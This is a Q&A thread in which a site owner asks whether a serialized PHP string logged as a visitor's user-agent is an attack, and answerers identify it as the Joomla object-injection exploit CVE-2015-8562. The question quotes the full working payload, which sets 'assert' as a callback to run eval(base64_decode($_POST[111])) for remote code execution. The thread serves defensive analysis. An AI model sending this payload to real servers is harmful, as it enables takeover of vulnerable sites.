# Is corrupt cgi useragent variable indication of attack?

Tags: coldfusion, cgi, sql-injection, malware

I have been collecting visitor data for one of my websites including domain, scriptName, queryString, remoteHost, userAgent, httpReferer, rtTimeStamp using the cgi variables available to coldFusion. I got an error about a userAgent string being out of range. I took a closer look and found that the cgi.userAgent variable returned the following:

```
}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:
"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:
"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:
"javascript";i:9999;s:8:"feed_url";s:54:"eval(base64_decode($_POST[111]));JFactory:
:get();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ð'
```

I added the linebreaks for readability.  The cgi.httpReferrer was blank. Is this an error or an indication of an attack of some sort? I have always expected the cgi variables to be somewhat safe but now thinking I should add validation to those as well.

So my ultimate question is does anyone recognize this code as some form of attack?

Comment: A very brief search for the first part of that string, turns up some Joomla object exploits that look very similar. AFAIK, anything client supplied, like userAgent, is always suspect. https://security.stackexchange.com/questions/1310/security-review-http-header-user-agent-has-been-set-to-something

Comment: i've had it before where the useragent was a sql statement! thank you cfqueryparam :)

Answer (score 2):

Yes, the corrupt USERAGENT header is an indication of an attack. It is [an injection exploit aimed at the Joomla Content Management System](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562). It was a [zero-day exploit, described in the securityfocus site](http://www.securityfocus.com/archive/1/archive/1/537219/100/0/threaded).